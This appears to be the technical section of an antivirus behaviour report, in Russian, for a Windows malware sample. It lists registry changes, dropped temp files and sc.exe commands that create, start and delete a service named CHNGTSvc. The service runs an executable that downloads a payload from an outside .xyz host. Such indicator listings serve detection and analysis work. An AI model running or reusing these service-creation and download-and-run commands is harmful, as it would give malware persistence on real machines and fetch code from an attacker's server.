Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\CHNGTSvc] 'ImagePath' = 'c:\exervice.exe http://cloudfront.e3ba815fc687db2682e1c56404cfb4df5f55def6.xyz/download/xpack1024_PL_PT_RO.1477323538.exe'
- '%TEMP%\nsp2.tmp\ns5.tmp' sc start CHNGTSvc
- '<SYSTEM32>\sc.exe' start CHNGTSvc
- 'C:\exervice.exe' http://cl########.####815fc687db2682e1c56404cfb4df5f55def6.xyz/download/xpack1024_PL_PT_RO.1477323538.exe
- '<SYSTEM32>\sc.exe' create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####815fc687db2682e1c56404cfb4df5f55def6.xyz/download/xpack1024_PL_PT_RO.1477323538.exe"
- '%TEMP%\nsp2.tmp\ns3.tmp' sc delete CHNGTSvc
- '<SYSTEM32>\sc.exe' delete CHNGTSvc
- '%TEMP%\nsp2.tmp\ns4.tmp' sc create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####815fc687db2682e1c56404cfb4df5f55def6.xyz/download/xpack1024_PL_PT_RO.1477323538.exe"
- %TEMP%\nsp2.tmp\ns4.tmp
- %TEMP%\nsp2.tmp\ns5.tmp
- %TEMP%\nsp2.tmp\ns3.tmp
- C:\exervice.exe
- %TEMP%\nsp2.tmp\nsExec.dll
- %TEMP%\nsp2.tmp\ns4.tmp
- %TEMP%\nsp2.tmp\ns3.tmp